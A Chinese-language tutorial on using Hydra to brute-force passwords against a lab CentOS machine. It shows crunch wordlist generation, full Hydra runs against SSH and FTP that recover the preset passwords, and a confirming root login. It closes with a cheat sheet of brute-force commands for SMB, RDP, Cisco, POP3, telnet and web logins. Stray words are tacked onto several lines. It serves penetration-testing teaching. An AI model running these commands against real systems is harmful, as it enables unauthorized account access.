kali使用hydra工具進行ssh、ftp等密碼爆破
簡介php
hydra破解工具支持多種協議的登陸密碼,能夠添加新組件,使用方便靈活。hydra可在Linux、Windows和OS X中使用。hydra能夠用來破解不少種服務,包括IMAP,HTTP,SMB,VNC,MS-SQL,MySQL,SMTP等等web
hydra的主要選項(摘自《Kail Linux&BackTrack滲透測試實戰》)centos
-R 修復以前使用的aborted/crashed session服務器
-S 執行SSL(Secure Socket Layer)鏈接session
-s Port 使用非默認服務器端口而是其餘端口時,指定其端口ssh
-l Login 已經獲取登陸ID的狀況下輸入登陸ID工具
-L FILE 未獲取登陸ID狀況下指定用於暴力破解的文件(須要指出全路徑)測試
-p Pass 已經獲取登陸密碼的狀況下輸入登陸密碼線程
-P FILE 未獲取登陸密碼的狀況下指定用於暴力破解的文件(須要指出全路徑)3d
-x MIN:MAX:CHARSET 暴力破解時不指定文件,而生能夠知足指定字符集和最短、最長長度條件的密碼來嘗試暴力破解
-C FILE 用於指定由冒號區分形式的暴力破解專用文件,即ID:Password形式
-M FILE指定實施並列攻擊的文件服務器的目錄文件
-o FILE以STDOUT的形式輸出結果值
-f 查找到第一個能夠使用的ID和密碼的時候中止破解
-t TASKS 指定並列鏈接數(默認值:16)
-w 指定每一個線程的迴應時間(Waittime)(默認值:32秒)
-4/6 指定IPv4/IPv6(默認值:IPv4)
-v/-V 顯示詳細信息
-U 查看服務器組件使用明細
測試環境:
爆破機:kali 2.0
靶機:centos 7 root密碼設置爲aab=8
新建一個名爲www的ftp用戶,密碼爲aab*2
在kali生成一個5位數的密碼字典
Bash
| 1 |
# crunch 5 5 -t @@@^% -d 2@ -d 3% -o pwd.txt |
測試爆破靶機ssh密碼
Bash
| 1 2 3 4 5 6 7 8 9 10 11 12 13 |
# hydra -l root -w 10 -P pwd.txt -t 10 -v -f 192.168.1.20 ssh Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-25 10:26:42 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 10 tasks per 1 server, overall 10 tasks, 5791500 login tries (l:1/p:5791500), ~579150 tries per task [DATA] attacking ssh://192.168.1.20:22/ [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [INFO] Testing if password authentication is supported by ssh://root@192.168.1.20:22 [INFO] Successful, password authentication is supported by ssh://192.168.1.20:22 [22][ssh] host: 192.168.1.20 login: root password: aab=8 [STATUS] attack finished for 192.168.1.20 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2017-12-25 10:27:30 |
參數解釋:-l root 指定爆破帳號爲root
-w 10 指定每一個線程的迴應時間爲10S
-P pwd.txt 指定密碼字典爲pwd.txt
-t 10 指定爆破線程爲10個
-v 指定顯示爆破過程
-f 查找到第一個能夠使用的ID和密碼的時候中止破解
經過上面的信息返回。能夠看出爆破目標機器的ssh帳號爲root,密碼爲aab=8
驗證ssh登陸
Bash
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
# ssh root@192.168.1.20 The authenticity of host '192.168.1.20 (192.168.1.20)' can't be established. ECDSA key fingerprint is SHA256:bpQenu68ORyOIYGDDMry5qXZq34KU9wqjStnjrU+c/g. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.1.20' (ECDSA) to the list of known hosts. root@192.168.1.20's password: Last login: Mon Dec 25 10:28:52 2017 from 192.168.1.107 [root@localhost ~]# ifconfig ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.20 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::5722:18f8:eebb:35f2 prefixlen 64 scopeid 0x20<link> ether 00:0c:29:fd:51:31 txqueuelen 1000 (Ethernet) RX packets 9302 bytes 1035118 (1010.8 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 8116 bytes 1209917 (1.1 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 [root@localhost ~]# exit logout Connection to 192.168.1.20 closed. |
測試爆破靶機ftp密碼
Bash
| 1 2 3 4 5 6 7 8 9 10 11 |
# hydra -l www -w 10 -P pwd.txt -t 10 -v -f 192.168.1.20 ftp Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-25 10:31:05 [DATA] max 10 tasks per 1 server, overall 10 tasks, 5791500 login tries (l:1/p:5791500), ~579150 tries per task [DATA] attacking ftp://192.168.1.20:21/ [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [STATUS] 66.00 tries/min, 66 tries in 00:01h, 5791434 to do in 1462:30h, 10 active [21][ftp] host: 192.168.1.20 login: www password: aab*2 [STATUS] attack finished for 192.168.1.20 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2017-12-25 10:32:13 |
經過上面的信息返回。能夠看出爆破目標機器的ftp帳號爲www,密碼爲aab*2
一些示例:
使用hydra破解ssh的密碼
Bash
| 1 |
# hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh |
破解https:
Bash
| 1 |
# hydra -m /index.php -l username -P pass.txt IP https |
破解teamspeak:
Bash
| 1 |
# hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak |
破解cisco:
Bash
| 1 2 |
# hydra -P pass.txt IP cisco # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable |
破解smb:
Bash
| 1 |
# hydra -l administrator -P pass.txt IP smb |
破解pop3:
Bash
| 1 |
# hydra -l muts -P pass.txt my.pop3.mail pop3 |
破解rdp:
Bash
| 1 |
# hydra IP rdp -l administrator -P pass.txt -V |
破解http-proxy:
Bash
| 1 |
# hydra -l admin -P pass.txt http-proxy://10.36.16.18 |
破解telnet
Bash
| 1 |
# hydra IP telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -V |
破解ftp:
Bash
| 1 2 |
# hydra IP ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV # hydra IP ftp -l 用戶名 -P 密碼字典 -e ns -vV |
get方式提交,破解web登陸:
Bash
| 1 2 |
# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns IP http-get /admin/ # hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f IP http-get /admin/index.php |